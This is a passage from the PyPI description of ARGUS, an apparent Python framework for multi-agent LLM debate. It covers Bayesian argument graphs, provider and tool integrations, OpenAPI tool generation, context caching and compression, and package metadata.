- Histogram binning for reliability diagrams
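Both metrics are standard; minimal reference implementations of the Brier score and histogram-binned ECE (illustrative sketches, not the `argus` API) look like this:

```python
def brier_score(probs, outcomes):
    """Mean squared error between predicted probabilities and 0/1 outcomes."""
    return sum((p - y) ** 2 for p, y in zip(probs, outcomes)) / len(probs)

def expected_calibration_error(probs, outcomes, n_bins=10):
    """ECE via histogram binning: per-bin |confidence - accuracy|, weighted."""
    bins = [[] for _ in range(n_bins)]
    for p, y in zip(probs, outcomes):
        bins[min(int(p * n_bins), n_bins - 1)].append((p, y))
    ece = 0.0
    for items in bins:
        if not items:
            continue
        confidence = sum(p for p, _ in items) / len(items)
        accuracy = sum(y for _, y in items) / len(items)
        ece += (len(items) / len(probs)) * abs(confidence - accuracy)
    return ece

probs = [0.9, 0.8, 0.3, 0.1]
outcomes = [1, 1, 0, 0]
print(brier_score(probs, outcomes))  # ≈ 0.0375
```

Lower is better for both: 0 means perfectly calibrated (ECE) or perfectly sharp and correct (Brier).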
### Provenance & Governance
**Event Types:**
| Event | Description |
|-------|-------------|
| `SESSION_START` | Debate session initialization |
| `PROPOSITION_ADDED` | New proposition registered |
| `EVIDENCE_ADDED` | Evidence attached to proposition |
| `REBUTTAL_ADDED` | Rebuttal targeting evidence |
| `VERDICT_RENDERED` | Jury verdict recorded |
| `SESSION_END` | Session completion |
**Integrity Features:**
- SHA-256 hash chain for tamper detection
- PROV-O compatible event model
- Cryptographic attestations for content
- Query API for filtering and analysis
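A SHA-256 hash chain of this kind can be sketched in a few lines (illustrative only; ARGUS's actual ledger schema and field names will differ):

```python
import hashlib
import json

def append_event(ledger, event):
    """Append an event, chaining its hash to the previous entry's hash."""
    prev_hash = ledger[-1]["hash"] if ledger else "0" * 64
    payload = json.dumps(event, sort_keys=True)
    digest = hashlib.sha256((prev_hash + payload).encode()).hexdigest()
    ledger.append({"event": event, "prev": prev_hash, "hash": digest})

def verify_chain(ledger):
    """Recompute every hash; editing any entry breaks all later links."""
    prev_hash = "0" * 64
    for entry in ledger:
        payload = json.dumps(entry["event"], sort_keys=True)
        expected = hashlib.sha256((prev_hash + payload).encode()).hexdigest()
        if entry["prev"] != prev_hash or entry["hash"] != expected:
            return False
        prev_hash = entry["hash"]
    return True

ledger = []
append_event(ledger, {"type": "SESSION_START"})
append_event(ledger, {"type": "EVIDENCE_ADDED", "id": "e1"})
print(verify_chain(ledger))  # True
```

Since each entry's hash covers the previous hash, tampering with any recorded event invalidates every subsequent link, which is what makes the audit trail tamper-evident.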
---
## Installation
### From PyPI (Recommended)
```bash
pip install argus-debate-ai
```
### From Source (Development)
```bash
git clone https://github.com/argus-ai/argus.git
cd argus
pip install -e ".[dev]"
```
### Optional Dependencies
```bash
# All features including development tools
pip install argus-debate-ai[all]
# Individual extras
pip install argus-debate-ai[ollama] # Ollama local LLM support
pip install argus-debate-ai[cohere] # Cohere integration
pip install argus-debate-ai[mistral] # Mistral integration
pip install argus-debate-ai[groq] # Groq LPU inference
pip install argus-debate-ai[arxiv] # arXiv connector
```
### System Requirements
| Requirement | Minimum | Recommended |
|-------------|---------|-------------|
| Python | 3.11+ | 3.12+ |
| RAM | 4 GB | 16 GB |
| Storage | 1 GB | 10 GB (with embeddings) |
| GPU | None | CUDA-compatible (for local embeddings) |
---
## Quick Start
### Basic Usage
```python
from argus import RDCOrchestrator, get_llm
# Initialize with any supported LLM
llm = get_llm("openai", model="gpt-4o")
# Run a debate on a proposition
orchestrator = RDCOrchestrator(llm=llm, max_rounds=5)
result = orchestrator.debate(
"The new treatment reduces symptoms by more than 20%",
prior=0.5, # Start with 50/50 uncertainty
)
print(f"Verdict: {result.verdict.label}")
print(f"Posterior: {result.verdict.posterior:.3f}")
print(f"Evidence: {result.num_evidence} items")
print(f"Reasoning: {result.verdict.reasoning}")
```
### Building a Debate Graph Manually
```python
from argus import CDAG, Proposition, Evidence, Rebuttal, EdgeType
from argus.cdag.nodes import EvidenceType
from argus.cdag.propagation import compute_posterior
# Create the graph
graph = CDAG(name="drug_efficacy_debate")
# Add the proposition to evaluate
prop = Proposition(
text="Drug X is effective for treating condition Y",
prior=0.5,
domain="clinical",
)
graph.add_proposition(prop)
# Add supporting evidence
trial_evidence = Evidence(
text="Phase 3 RCT showed 35% symptom reduction (n=500, p<0.001)",
evidence_type=EvidenceType.EMPIRICAL,
polarity=1, # Supports
confidence=0.9,
relevance=0.95,
quality=0.85,
)
graph.add_evidence(trial_evidence, prop.id, EdgeType.SUPPORTS)
# Add challenging evidence
side_effect = Evidence(
text="15% of patients experienced adverse events",
evidence_type=EvidenceType.EMPIRICAL,
polarity=-1, # Attacks
confidence=0.8,
relevance=0.7,
)
graph.add_evidence(side_effect, prop.id, EdgeType.ATTACKS)
# Add rebuttal to the challenge
rebuttal = Rebuttal(
text="Adverse events were mild and resolved without intervention",
target_id=side_effect.id,
rebuttal_type="clarification",
strength=0.7,
confidence=0.85,
)
graph.add_rebuttal(rebuttal, side_effect.id)
# Compute Bayesian posterior
posterior = compute_posterior(graph, prop.id)
print(f"Posterior probability: {posterior:.3f}")
```
### Document Ingestion & Retrieval
```python
from argus import DocumentLoader, Chunker, EmbeddingGenerator
from argus.retrieval import HybridRetriever
# Load documents (supports PDF, TXT, HTML, Markdown, JSON)
loader = DocumentLoader()
doc = loader.load("research_paper.pdf")
# Chunk with overlap for context preservation
chunker = Chunker(chunk_size=512, chunk_overlap=50)
chunks = chunker.chunk(doc)
# Create hybrid retriever
retriever = HybridRetriever(
embedding_model="all-MiniLM-L6-v2",
lambda_param=0.7, # Weight toward dense retrieval
use_reranker=True,
)
retriever.index_chunks(chunks)
# Search with hybrid scoring
results = retriever.retrieve("treatment efficacy results", top_k=10)
for r in results:
print(f"[{r.rank}] Score: {r.score:.3f} - {r.chunk.text[:100]}...")
```
### Multi-Agent Debate
```python
from argus import get_llm
from argus.agents import Moderator, Specialist, Refuter, Jury
from argus import CDAG, Proposition
# Initialize LLM (can use different models for different agents)
llm = get_llm("anthropic", model="claude-3-5-sonnet-20241022")
# Initialize agents
moderator = Moderator(llm)
specialist = Specialist(llm, domain="clinical")
refuter = Refuter(llm)
jury = Jury(llm)
# Create debate graph
graph = CDAG()
prop = Proposition(text="The intervention is cost-effective", prior=0.5)
graph.add_proposition(prop)
# Moderator creates agenda
agenda = moderator.create_agenda(graph, prop.id)
# Specialists gather evidence
evidence = specialist.gather_evidence(graph, prop.id)
# Refuter challenges evidence
rebuttals = refuter.generate_rebuttals(graph, prop.id)
# Jury renders verdict
verdict = jury.evaluate(graph, prop.id)
print(f"Verdict: {verdict.label} (posterior={verdict.posterior:.3f})")
print(f"Reasoning: {verdict.reasoning}")
```
---
## LLM Providers (27+)
ARGUS v3.1 supports **27+ LLM providers** through a unified interface. All providers implement the same `BaseLLM` interface for seamless interchangeability.
### Supported Providers
| Provider | Models | Features | API Key Env Variable |
|----------|--------|----------|---------------------|
| **OpenAI** | GPT-4o, GPT-4, o1 | Generate, Stream, Embed | `OPENAI_API_KEY` |
| **Anthropic** | Claude 3.5 Sonnet, Opus | Generate, Stream | `ANTHROPIC_API_KEY` |
| **Google** | Gemini 1.5 Pro/Flash | Generate, Stream, Embed | `GOOGLE_API_KEY` |
| **Ollama** | Llama 3.2, Mistral, Phi | Local deployment | N/A (local) |
| **Cohere** | Command R, R+ | Generate, Stream, Embed | `COHERE_API_KEY` |
| **Mistral** | Large, Small, Codestral | Generate, Stream, Embed | `MISTRAL_API_KEY` |
| **Groq** | Llama 3.1 70B (ultra-fast) | Generate, Stream | `GROQ_API_KEY` |
| **DeepSeek** | DeepSeek Chat, Coder | Generate, Stream | `DEEPSEEK_API_KEY` |
| **xAI** | Grok-beta | Generate, Stream | `XAI_API_KEY` |
| **Perplexity** | Sonar (search-grounded) | Generate, Stream | `PERPLEXITY_API_KEY` |
| **Together** | 100+ open models | Generate, Stream, Embed | `TOGETHER_API_KEY` |
| **Fireworks** | Fast inference | Generate, Stream | `FIREWORKS_API_KEY` |
| **NVIDIA** | NIM endpoints | Generate, Stream | `NVIDIA_API_KEY` |
| **Azure OpenAI** | GPT-4 on Azure | Generate, Stream, Embed | `AZURE_OPENAI_API_KEY` |
| **AWS Bedrock** | Claude, Llama on AWS | Generate, Stream | AWS credentials |
| **Vertex AI** | Gemini on GCP | Generate, Stream | GCP credentials |
| **+ 10 more** | See docs | Various | Various |
### Usage Examples
#### OpenAI
```python
from argus.core.llm import OpenAILLM
llm = OpenAILLM(model="gpt-4o")
response = llm.generate("Explain quantum computing")
print(response.content)
```
#### Anthropic
```python
from argus.core.llm import AnthropicLLM
llm = AnthropicLLM(model="claude-3-5-sonnet-20241022")
response = llm.generate(
"Analyze this research methodology",
system_prompt="You are a research methodology expert."
)
```
#### Google Gemini
```python
from argus.core.llm import GeminiLLM
llm = GeminiLLM(model="gemini-1.5-pro")
response = llm.generate("Summarize the key findings")
# Also supports embeddings
embeddings = llm.embed(["text to embed"])
```
#### Ollama (Local)
```python
from argus.core.llm import OllamaLLM
llm = OllamaLLM(model="llama3.1", host="http://localhost:11434")
response = llm.generate("What is the capital of France?")
```
#### Cohere
```python
from argus.core.llm import CohereLLM
llm = CohereLLM(model="command-r-plus")
response = llm.generate("Explain machine learning")
# Cohere embeddings with input types
embeddings = llm.embed(
["search query"],
input_type="search_query" # or "search_document"
)
```
#### Mistral
```python
from argus.core.llm import MistralLLM
llm = MistralLLM(model="mistral-large-latest")
response = llm.generate(
"Write a Python function",
temperature=0.3
)
# Streaming
for chunk in llm.stream("Tell me a story"):
print(chunk, end="", flush=True)
```
#### Groq (Ultra-Fast Inference)
```python
from argus.core.llm import GroqLLM
llm = GroqLLM(model="llama-3.1-70b-versatile")
response = llm.generate("Explain photosynthesis")
# Groq also supports audio transcription
transcript = llm.transcribe("audio.wav")
```
### Provider Registry
```python
from argus.core.llm import get_llm, list_providers, register_provider
# List available providers
print(list_providers())
# ['openai', 'anthropic', 'gemini', 'ollama', 'cohere', 'mistral', 'groq']
# Get LLM by provider name
llm = get_llm("groq", model="llama-3.1-70b-versatile")
# Register custom provider
class MyCustomLLM(BaseLLM):
# ... implementation
pass
register_provider("custom", MyCustomLLM)
```
---
## Embedding Models (16+)
ARGUS v3.1 includes 16 embedding providers for semantic search and RAG applications.
### Available Providers
| Type | Providers |
|------|-----------|
| **Local (Free)** | SentenceTransformers, FastEmbed, Ollama |
| **Cloud APIs** | OpenAI, Cohere, HuggingFace, Voyage, Mistral, Google, Azure, Together, NVIDIA, Jina, Nomic, Bedrock, Fireworks |
### Quick Examples
```python
from argus.embeddings import get_embedding, list_embedding_providers
# List all 16 providers
print(list_embedding_providers())
# Local embedding (free, no API key)
embedder = get_embedding("sentence_transformers", model="all-MiniLM-L6-v2")
vectors = embedder.embed_documents(["Hello world", "Machine learning"])
print(f"Dimension: {len(vectors[0])}") # 384
# Query embedding for search
query_vec = embedder.embed_query("What is AI?")
# OpenAI embeddings
embedder = get_embedding("openai", model="text-embedding-3-small")
vectors = embedder.embed_documents(["Doc 1", "Doc 2"])
# Cohere embeddings
embedder = get_embedding("cohere", model="embed-english-v3.0")
query_vec = embedder.embed_query("search query") # Uses search_query input type
```
---
## Tool Integrations (50+)
ARGUS v3.1 includes **50+ pre-built tools** across 13 categories for comprehensive agent capabilities.
### Available Tools by Category
| Category | Tools | Description |
|----------|-------|-------------|
| **Search** | DuckDuckGo, Wikipedia, ArXiv, Tavily, Brave, Exa | Web and academic search |
| **Web** | Requests, WebScraper, JinaReader, YouTube | Web content access |
| **Productivity** | FileSystem, PythonREPL, Shell, GitHub, JSON | Core productivity |
| **Database** | SQL, Pandas | Data access and manipulation |
| **Finance** | YahooFinance, Weather | Financial and weather data |
| **AI Agents** | AgentMail, AgentOps, GoodMem, Freeplay | AI agent infrastructure |
| **Cloud** | BigQuery, PubSub, CloudTrace, VertexAI Search/RAG | Google Cloud services |
| **Vector DB** | Chroma, Pinecone, Qdrant, MongoDB | Vector databases |
| **Productivity (Extended)** | Asana, Jira, Confluence, Linear, Notion | Project management |
| **Communication** | Mailgun, Stripe, PayPal | Email and payments |
| **DevOps** | GitLab, Postman, Daytona, N8n | Development operations |
| **Media/AI** | ElevenLabs, Cartesia, HuggingFace | Media and AI platforms |
| **Observability** | Arize, Phoenix, Monocle, MLflow, W&B Weave | ML observability |
### Installation
```bash
# Core tools (search, web, productivity, database, finance)
pip install argus-debate-ai[tools]
# Extended tools (all 50+ integrations)
pip install argus-debate-ai[tools-extended]
# Or install all features
pip install argus-debate-ai[all]
```
### Quick Examples
```python
from argus.tools.integrations import (
# Search
DuckDuckGoTool, WikipediaTool, ArxivTool,
# Productivity
PythonReplTool, AsanaTool, NotionTool,
# Cloud
BigQueryTool, VertexAISearchTool,
# Vector DB
PineconeTool, QdrantTool,
# Observability
MLflowTool, WandBWeaveTool,
)
# Free web search
search = DuckDuckGoTool()
result = search(query="latest AI research 2024", max_results=5)
for r in result.data["results"]:
print(f"- {r['title']}: {r['url']}")
# Wikipedia lookup
wiki = WikipediaTool()
result = wiki(query="Machine Learning", action="summary", sentences=3)
print(result.data["summary"])
# ArXiv paper search
arxiv = ArxivTool()
result = arxiv(query="transformer attention", max_results=5)
for paper in result.data["results"]:
print(f"📄 {paper['title']}")
# Execute Python code
repl = PythonReplTool()
result = repl(code="print(sum([1,2,3,4,5]))")
print(result.data["output"]) # 15
# Asana task management
asana = AsanaTool()
result = asana(action="list_tasks", project_gid="your-project-id")
# Notion database query
notion = NotionTool()
result = notion(action="query_database", database_id="your-db-id")
# BigQuery data analysis
bq = BigQueryTool()
result = bq(action="query", query="SELECT * FROM dataset.table LIMIT 10")
# Pinecone vector search
pinecone = PineconeTool()
result = pinecone(action="query", vector=[0.1]*1536, top_k=5)
# MLflow experiment tracking
mlflow = MLflowTool()
result = mlflow(action="log_metric", run_id="run-123", key="accuracy", value=0.95)
# W&B Weave tracing
weave = WandBWeaveTool()
result = weave(action="log_call", call_data={"model": "gpt-4", "input": "Hello"})
```
### AI Agent Tools
Tools for AI agent infrastructure and orchestration:
```python
from argus.tools.integrations import AgentMailTool, AgentOpsTool, GoodMemTool, FreeplayTool
# AgentMail - Autonomous email handling
agentmail = AgentMailTool()
result = agentmail(action="create_inbox", name="support-agent")
# AgentOps - Agent observability
agentops = AgentOpsTool()
result = agentops(action="create_session", tags=["prod", "customer-support"])
# GoodMem - Long-term memory for agents
goodmem = GoodMemTool()
result = goodmem(action="create_memory", content="User prefers detailed explanations")
# Freeplay - LLM testing and evaluation
freeplay = FreeplayTool()
result = freeplay(action="run_test", prompt_id="prompt-123")
```
### Cloud Tools
Google Cloud Platform integrations:
```python
from argus.tools.integrations import (
BigQueryTool, PubSubTool, CloudTraceTool,
VertexAISearchTool, VertexAIRAGTool,
)
# BigQuery - Data warehouse
bq = BigQueryTool()
result = bq(action="query", query="SELECT * FROM analytics.events LIMIT 100")
# Pub/Sub - Messaging
pubsub = PubSubTool()
result = pubsub(action="publish", topic="events", message={"event": "user_signup"})
# Cloud Trace - Distributed tracing
trace = CloudTraceTool()
result = trace(action="create_span", name="process_request")
# Vertex AI Search - Enterprise search
search = VertexAISearchTool()
result = search(action="search", query="product documentation", data_store_id="my-store")
# Vertex AI RAG - Retrieval augmented generation
rag = VertexAIRAGTool()
result = rag(action="query", query="How do I configure X?", corpus_id="my-corpus")
```
### Vector Database Tools
Full CRUD operations for vector databases:
```python
from argus.tools.integrations import ChromaTool, PineconeTool, QdrantTool, MongoDBTool
# Chroma - Local vector DB
chroma = ChromaTool()
result = chroma(action="add", collection="docs", documents=["Hello world"], ids=["doc1"])
# Pinecone - Cloud vector DB
pinecone = PineconeTool()
result = pinecone(action="upsert", vectors=[{"id": "v1", "values": [0.1]*1536}])
# Qdrant - High-performance vector search
qdrant = QdrantTool()
result = qdrant(action="search", collection="embeddings", vector=[0.1]*384, limit=5)
# MongoDB - Document + vector search
mongodb = MongoDBTool()
result = mongodb(action="vector_search", collection="articles", vector=[0.1]*1536)
```
### Productivity Tools (Extended)
Project management and documentation tools:
```python
from argus.tools.integrations import AsanaTool, JiraTool, ConfluenceTool, LinearTool, NotionTool
# Asana - Project management
asana = AsanaTool()
result = asana(action="create_task", project_gid="123", name="Review PR", assignee="me")
# Jira - Issue tracking
jira = JiraTool()
result = jira(action="create_issue", project_key="PROJ", summary="Bug fix", issue_type="Bug")
# Confluence - Documentation
confluence = ConfluenceTool()
result = confluence(action="create_page", space_key="DOCS", title="API Guide", body="<p>...</p>")
# Linear - Engineering issues
linear = LinearTool()
result = linear(action="create_issue", team_id="team-123", title="Feature request")
# Notion - Knowledge management
notion = NotionTool()
result = notion(action="create_page", parent_id="page-123", title="Meeting Notes")
```
### Communication & Payment Tools
Email and payment processing:
```python
from argus.tools.integrations import MailgunTool, StripeTool, PayPalTool
# Mailgun - Email sending
mailgun = MailgunTool()
result = mailgun(action="send", to="user@example.com", subject="Welcome!", text="...")
# Stripe - Payments
stripe = StripeTool()
result = stripe(action="create_payment_intent", amount=2000, currency="usd")
# PayPal - Payments
paypal = PayPalTool()
result = paypal(action="create_order", amount="19.99", currency="USD")
```
### DevOps Tools
Development operations and automation:
```python
from argus.tools.integrations import GitLabTool, PostmanTool, DaytonaTool, N8nTool
# GitLab - Git operations
gitlab = GitLabTool()
result = gitlab(action="create_merge_request", project_id=123, source="feature", target="main")
# Postman - API testing
postman = PostmanTool()
result = postman(action="run_collection", collection_id="col-123")
# Daytona - Dev environments
daytona = DaytonaTool()
result = daytona(action="create_workspace", repository="https://github.com/org/repo")
# N8n - Workflow automation
n8n = N8nTool()
result = n8n(action="execute_workflow", workflow_id="wf-123")
```
### Media & AI Tools
Media generation and AI platforms:
```python
from argus.tools.integrations import ElevenLabsTool, CartesiaTool, HuggingFaceTool
# ElevenLabs - Text-to-speech
elevenlabs = ElevenLabsTool()
result = elevenlabs(action="text_to_speech", text="Hello world", voice_id="voice-123")
# Cartesia - Audio AI
cartesia = CartesiaTool()
result = cartesia(action="synthesize", text="Welcome to ARGUS", voice_id="voice-456")
# HuggingFace - ML models
huggingface = HuggingFaceTool()
result = huggingface(action="inference", model_id="gpt2", inputs="The future of AI is")
```
### Observability Tools
ML observability and monitoring:
```python
from argus.tools.integrations import ArizeTool, PhoenixTool, MonocleTool, MLflowTool, WandBWeaveTool
# Arize - ML observability
arize = ArizeTool()
result = arize(action="log_prediction", model_id="classifier-v1", prediction=0.85)
# Phoenix - LLM tracing
phoenix = PhoenixTool()
result = phoenix(action="log_span", name="llm_call", input="Query", output="Response")
# Monocle - GenAI tracing
monocle = MonocleTool()
result = monocle(action="start_trace", name="agent_workflow")
# MLflow - Experiment tracking
mlflow = MLflowTool()
result = mlflow(action="create_run", experiment_id="exp-123")
# W&B Weave - LLM evaluation
weave = WandBWeaveTool()
result = weave(action="create_dataset", name="eval-dataset", rows=[...])
```
### Tool Registry
```python
from argus.tools.integrations import (
list_all_tools,
list_tool_categories,
get_tools_by_category,
get_tool_count,
)
# List all 50+ tools
print(list_all_tools())
# List categories (13 categories)
print(list_tool_categories())
# ['search', 'web', 'productivity', 'database', 'finance', 'ai_agents',
# 'cloud', 'vectordb', 'productivity_extended', 'communication',
# 'devops', 'media_ai', 'observability']
# Get tools by category
observability_tools = get_tools_by_category("observability")
# [ArizeTool, PhoenixTool, MonocleTool, MLflowTool, WandBWeaveTool]
# Total count
print(f"Total tools: {get_tool_count()}") # 50+
```
---
## OpenAPI REST Integration
ARGUS v3.1 includes a powerful OpenAPI module for automatically generating tools from REST API specifications.
### Features
- **OpenAPI v2 (Swagger) and v3 support**
- **Automatic client generation** from specs
- **Tool code generation** for agent integrations
- **Full authentication support** (API Key, Bearer, Basic, OAuth2)
- **Type-safe parameter handling**
### Installation
```bash
pip install argus-debate-ai[openapi]
```
### Quick Start
```python
from argus.core.openapi import (
load_openapi_spec,
OpenAPIParser,
OpenAPIClient,
OpenAPIToolGenerator,
)
# Load OpenAPI spec (JSON, YAML, or URL)
spec = load_openapi_spec("https://api.example.com/openapi.json")
# Parse the specification
parser = OpenAPIParser()
api_spec = parser.parse(spec)
print(f"API: {api_spec.title} v{api_spec.version}")
print(f"Endpoints: {len(api_spec.operations)}")
```
### Dynamic Client Generation
```python
from argus.core.openapi import create_client
# Create a dynamic REST client from any OpenAPI spec
client = create_client(
spec_path="https://petstore.swagger.io/v2/swagger.json",
api_key="your-api-key", # Or bearer_token, basic_auth
)
# Methods are generated automatically from the spec
pets = client.get_pets(limit=10)
pet = client.get_pet_by_id(pet_id=123)
new_pet = client.create_pet(name="Fluffy", status="available")
```
### Tool Code Generation
Generate complete tool implementations for agent use:
```python
from argus.core.openapi import generate_tool_code
# Generate a full BaseTool implementation
code = generate_tool_code(
spec_path="./api_spec.yaml",
class_name="PetStoreTool",
)
# Save to file
with open("petstore_tool.py", "w") as f:
f.write(code)
# The generated tool can be immediately used:
# from petstore_tool import PetStoreTool
# tool = PetStoreTool()
# result = tool(action="get_pets", limit=10)
```
### CLI Usage
```bash
# List available endpoints
argus openapi ./api_spec.yaml --list-endpoints
# Validate a spec
argus openapi https://api.example.com/openapi.json --validate
# Generate tool code
argus openapi ./api_spec.yaml --output my_tool.py --class-name MyAPITool
```
### Authentication
```python
from argus.core.openapi import create_client
# API Key authentication
client = create_client(spec_path="./spec.yaml", api_key="sk-xxx")
# Bearer token authentication
client = create_client(spec_path="./spec.yaml", bearer_token="eyJ...")
# Basic authentication
client = create_client(spec_path="./spec.yaml", basic_auth=("user", "pass"))
```
---
## Context Caching
ARGUS v3.1 includes a comprehensive caching system for optimizing context management, reducing API costs, and improving performance.
### Features
- **Multiple backends**: Memory (LRU), File (persistent), Redis (distributed)
- **Specialized caches**: Conversation, Embedding, LLM Response
- **TTL support**: Automatic expiration
- **Namespaces**: Isolated cache spaces
- **Statistics**: Hit rates, access patterns
### Installation
```bash
pip install argus-debate-ai[context]
```
### Quick Start
```python
from argus.core.context_caching import (
ContextCache,
MemoryBackend,
FileBackend,
ConversationCache,
EmbeddingCache,
LLMResponseCache,
)
# Simple in-memory cache
cache = ContextCache(backend=MemoryBackend())
cache.set("key", {"data": "value"}, ttl=3600)
result = cache.get("key")
# Persistent file cache
cache = ContextCache(
backend=FileBackend(cache_dir=".argus_cache"),
namespace="my_app",
)
```
### Conversation Cache
Efficiently manage multi-turn conversation history:
```python
from argus.core.context_caching import ConversationCache
# Create conversation cache
conv_cache = ConversationCache(max_messages=100, max_tokens=8000)
# Add messages
conv_cache.add_message("user", "Hello, how are you?")
conv_cache.add_message("assistant", "I'm doing well, thank you!")
# Get conversation for LLM
messages = conv_cache.get_messages()
# Get recent context with token limit
context = conv_cache.get_recent_context(max_tokens=4000)
# Summarize old messages to save space
conv_cache.summarize_and_truncate(llm=your_llm, keep_recent=10)
```
### Embedding Cache
Cache embeddings to reduce API calls:
```python
from argus.core.context_caching import EmbeddingCache
# Create embedding cache
embed_cache = EmbeddingCache(
backend=FileBackend(cache_dir=".embeddings_cache"),
model_name="text-embedding-3-small",
)
# Check cache before calling API
text = "Hello world"
cached = embed_cache.get(text)
if cached is None:
# Generate embedding
embedding = your_embedder.embed(text)
embed_cache.set(text, embedding)
else:
embedding = cached
# Batch operations
texts = ["doc1", "doc2", "doc3"]
cached, missing = embed_cache.get_batch(texts)
# Only generate embeddings for missing texts
```
### LLM Response Cache
Cache LLM responses for identical inputs:
```python
from argus.core.context_caching import LLMResponseCache
# Create response cache (deterministic key from prompt + params)
response_cache = LLMResponseCache(
backend=MemoryBackend(max_size=1000),
default_ttl=86400, # 24 hours
)
# Cache lookup
prompt = "Explain machine learning"
params = {"model": "gpt-4", "temperature": 0}
cached = response_cache.get(prompt, **params)
if cached is None:
response = llm.generate(prompt, **params)
response_cache.set(prompt, response, **params)
else:
response = cached
```
### Decorator Pattern
```python
from argus.core.context_caching import ContextCache
cache = ContextCache(backend=MemoryBackend())
@cache.cached(ttl=3600)
def expensive_computation(input_data: str) -> dict:
# This will be cached
return {"result": process(input_data)}
```
### CLI Usage
```bash
# Show cache statistics
argus cache stats --backend file --path .argus_cache
# Clear cache
argus cache clear --backend memory
# Export cache (for debugging/migration)
argus cache export --path ./cache_backup
```
---
## Context Compression
ARGUS v3.1 includes advanced compression techniques to reduce token usage while preserving meaning.
### Features
- **Multiple compression methods**: Whitespace, Punctuation, Stopword, Sentence, Code, Semantic
- **Compression levels**: Minimal, Moderate, Aggressive, Extreme
- **Token counting**: Accurate token estimation with tiktoken
- **Message compression**: Optimize conversation history
- **Auto-detection**: Automatically select best method for content type
### Installation
```bash
pip install argus-debate-ai[context]
```
### Quick Start
```python
from argus.core.context_compression import (
compress_text,
compress_to_tokens,
CompressionLevel,
)
# Simple compression
result = compress_text(
"This is a very long text with lots of whitespace...",
level=CompressionLevel.MODERATE,
)
print(result.compressed_text)
print(f"Savings: {result.savings_percentage:.1f}%")
# Compress to target token count
result = compress_to_tokens(long_text, target_tokens=1000)
print(f"Tokens saved: {result.tokens_saved}")
```
### Compression Methods
```python
from argus.core.context_compression import (
WhitespaceCompressor,
StopwordCompressor,
SentenceCompressor,
CodeCompressor,
SemanticCompressor,
)
# Whitespace compression (fastest, safest)
compressor = WhitespaceCompressor()
result = compressor.compress("Hello world") # "Hello world"
# Stopword removal (moderate compression)
compressor = StopwordCompressor()
result = compressor.compress("This is a very important document")
# "very important document"
# Sentence compression (keeps important sentences)
compressor = SentenceCompressor(ratio=0.5, min_sentences=3)
result = compressor.compress(long_document)
# Code compression (minifies code while preserving syntax)
compressor = CodeCompressor()
result = compressor.compress(python_code)
# Semantic compression (LLM-based, best quality)
compressor = SemanticCompressor(llm=your_llm)
result = compressor.compress(document, target_ratio=0.3)
```
### Message Compression
Compress conversation history for LLM context:
```python
from argus.core.context_compression import MessageCompressor
compressor = MessageCompressor(
max_tokens=4000,
preserve_system=True, # Keep system messages intact
preserve_recent=5, # Keep last 5 messages intact
)
messages = [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "Long user message..."},
{"role": "assistant", "content": "Long assistant response..."},
# ... many more messages
]
compressed = compressor.compress(messages)
print(f"Messages: {len(messages)} -> {len(compressed)}")
```
### Context Compressor (Auto)
Automatically detect content type and apply best compression:
```python
from argus.core.context_compression import ContextCompressor
compressor = ContextCompressor()
# Auto-detects content type and applies appropriate method
result = compressor.auto_compress(
content=mixed_content,
target_tokens=2000,
)
# Analyze content before compression
analysis = compressor.analyze(content)
print(f"Type: {analysis['content_type']}")
print(f"Current tokens: {analysis['token_count']}")
print(f"Recommended method: {analysis['recommended_method']}")
```
### CLI Usage
```bash
# Compress a file
argus compress input.txt --output compressed.txt --level moderate
# Compress to token target
argus compress input.txt --target-tokens 1000
# Specific compression method
argus compress code.py --method code --output minified.py
```
---
## Debate Visualization
ARGUS v3.1 includes a comprehensive visualization module for debate analysis and presentation.
### Features
- **Argument flow graphs**: NetworkX-based directed graphs
- **Timeline visualization**: Temporal argument progression
- **Agent performance charts**: Multi-metric agent analysis
- **Confidence evolution**: Rolling average tracking
- **Round summaries**: Per-round statistics
- **Interaction heatmaps**: Agent collaboration patterns
- **Interactive dashboards**: Combined multi-panel views
- **Export formats**: HTML, PNG, JSON reports
### Installation
```bash
pip install argus-debate-ai[plotting]
```
### Quick Start
```python
from argus.debate.visualization import (
DebateSession,
create_debate_dashboard,
export_debate_html,
plot_argument_flow,
)
import json
# Load debate data
with open("debate_results.json") as f:
data = json.load(f)
session = DebateSession.from_dict(data)
# Create comprehensive dashboard
fig = create_deb | text/markdown | null | "Ankush Pandey, Rishi Ghodawat, Ronit Mehta" <mehtaronit702@gmail.com> | null | ARGUS Team <mehtaronit702@gmail.com> | MIT | ai, artificial-intelligence, multi-agent, debate, reasoning, llm, gpt, claude, gemini, scientific-discovery, research, decision-making, fact-checking, verification, rag, retrieval-augmented-generation, embeddings, vector-search, knowledge-graph, bayesian-inference, argumentation, provenance, langchain-alternative, agent-framework, llm-framework, openai, anthropic, ollama, openapi, rest-api, context-caching, context-compression, tool-integrations, observability, mlops | [
"Development Status :: 6 - Mature",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Intended Audience :: Information Technology",
"Intended Audience :: Education",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Text Processing :: Linguistic",
"Topic :: Internet :: WWW/HTTP :: Indexing/Search",
"Framework :: AsyncIO",
"Typing :: Typed",
"Environment :: Console",
"Environment :: Web Environment",
"Natural Language :: English"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"pydantic<3.0,>=2.0",
"pydantic-settings<3.0,>=2.0",
"numpy<3.0,>=1.24",
"scipy<2.0,>=1.10",
"networkx<4.0,>=3.0",
"litellm<2.0,>=1.40",
"openai<2.0,>=1.30",
"anthropic<1.0,>=0.25",
"google-generativeai<1.0,>=0.5",
"sentence-transformers<3.0,>=2.2",
"rank-bm25<1.0,>=0.2",
"faiss-cpu<2.0,>=1.7",
"pymupdf<2.0,>=1.23",
"beautifulsoup4<5.0,>=4.12",
"lxml<6.0,>=4.9",
"chardet<6.0,>=5.0",
"click<9.0,>=8.0",
"rich<14.0,>=13.0",
"python-dotenv<2.0,>=1.0",
"httpx<1.0,>=0.25",
"tenacity<9.0,>=8.2",
"tiktoken<1.0,>=0.5",
"requests<3.0,>=2.31",
